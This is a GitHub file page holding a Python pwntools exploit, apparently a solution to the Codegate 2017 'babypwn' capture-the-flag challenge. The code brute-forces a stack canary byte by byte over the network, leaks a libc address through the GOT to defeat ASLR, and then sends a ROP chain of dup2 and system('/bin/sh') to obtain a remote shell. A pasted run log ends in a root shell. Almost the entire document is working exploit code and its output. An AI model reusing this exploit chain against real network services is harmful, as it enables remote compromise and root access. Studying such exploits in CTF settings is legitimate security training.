-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathexploit.py
160 lines (124 loc) · 3.34 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
from pwn import *
import sys
HOST = '127.0.0.1'
PORT = 8181
context(os = "linux", arch = "i386")
#context.log_level = 'DEBUG'
elf = ELF("./babypwn")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
def screen_clean():
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
def canary_bruteforce(offset):
junk = "A" * offset
canary_value = ""
while len(canary_value) < 4:
word = 0x00
while word < 0xff:
try:
r = remote(HOST, PORT)
screen_clean()
payload = ""
payload += junk
payload += canary_value
payload += chr(word)
r.sendlineafter("> ", "2")
r.sendafter("Message : ", payload)
r.sendlineafter("> ", "3")
r.recv()
log.success("Byte found: " + hex(word))
canary_value += chr(word)
r.close()
screen_clean()
break
except EOFError as error:
word += 1
r.close()
screen_clean()
return u32(canary_value)
log.info("Deploying stage 1: Canary bruteforce")
canary_offset = 40
canary_value = canary_bruteforce(canary_offset)
log.success("Canary value: " + hex(canary_value))
log.info("Deploying stage 2: Leak base libc address")
leak = flat (
"A" * canary_offset,
canary_value,
"B" * 0xc,
elf.sym['send'],
"AAAA",
0x4,
elf.got['fork'],
0x4,
0x0,
endianness = 'little', word_size = 32, sign = False)
r = remote(HOST, PORT)
screen_clean()
r.sendlineafter("> ", "2")
r.sendafter("Message : ", leak)
r.sendlineafter("> ", "3")
fork_leak = u32(r.recv(4))
log.success("Leaked fork@@GLIBC address: " + hex(fork_leak))
r.close()
screen_clean()
libc.address = fork_leak - libc.sym['fork']
log.success("Base libc address: " + hex(libc.address))
log.success("Dup2@@GLIBC address: " + hex(libc.sym['dup2']))
log.success("System@@GLIBC address: " + hex(libc.sym['system']))
log.success("/bin/sh address: " + hex(libc.search('/bin/sh').next()))
log.info("Deploying stage 3: Shell spawn")
shell = flat (
"A" * canary_offset,
canary_value,
"B" * 0xc,
libc.sym['dup2'],
0x08048b84, # pop edi ; pop ebp ; ret (Cleaning the stack)
0x4,
0x0,
libc.sym['dup2'],
0x08048b84, # pop edi ; pop ebp ; ret (Cleaning the stack)
0x4,
0x1,
libc.sym['system'],
libc.sym['exit'],
libc.search('/bin/sh').next(),
endianness = 'little', word_size = 32, sign = False)
r = remote(HOST, PORT)
screen_clean()
r.sendlineafter("> ", "2")
r.sendafter("Message : ", shell)
r.sendlineafter("> ", "3")
r.interactive()
r.close()
screen_clean()
'''
kaorz@kali:~/Exp/babypwn_codegate_2017# python exploit.py
[*] '/root/Desktop/Exp/Exp/babypwn_codegate_2017/babypwn'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[*] '/lib/i386-linux-gnu/libc.so.6'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Deploying stage 1: Canary bruteforce
[+] Byte found: 0x0
[+] Byte found: 0xd0
[+] Byte found: 0xc9
[+] Byte found: 0xb0
[+] Canary value: 0xb0c9d000
[*] Deploying stage 2: Leak base libc address
[+] Leaked fork@@GLIBC address: 0xf7dcb190
[+] Base libc address: 0xf7d0d000
[+] Dup2@@GLIBC address: 0xf7df32a0
[+] System@@GLIBC address: 0xf7d49d10
[+] /bin/sh address: 0xf7e88988
[*] Deploying stage 3: Shell spawn
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) grupos=0(root)
'''